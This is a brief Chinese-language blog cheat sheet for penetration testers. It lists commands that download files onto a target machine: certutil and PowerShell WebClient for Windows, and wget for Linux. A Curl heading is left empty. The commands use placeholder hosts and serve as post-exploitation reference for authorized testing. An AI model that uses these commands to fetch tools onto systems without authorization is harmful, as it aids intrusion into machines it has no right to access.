其他分享
首页 > 其他分享> > 渗透测试人员文件下载的主要方法

渗透测试人员文件下载的主要方法

作者:互联网

目标机器为Windows:

Certutil.exe
certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]

 

 

Powershell

powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

 

 

目标机器为Linux

 

wget http://ip-addr[:port]/file[-o output-file].

 

 

Curl

 

 

 

标签:http,addr,渗透,ip,测试人员,file,output,port,下载
来源: https://www.cnblogs.com/jason-huawen/p/16365653.html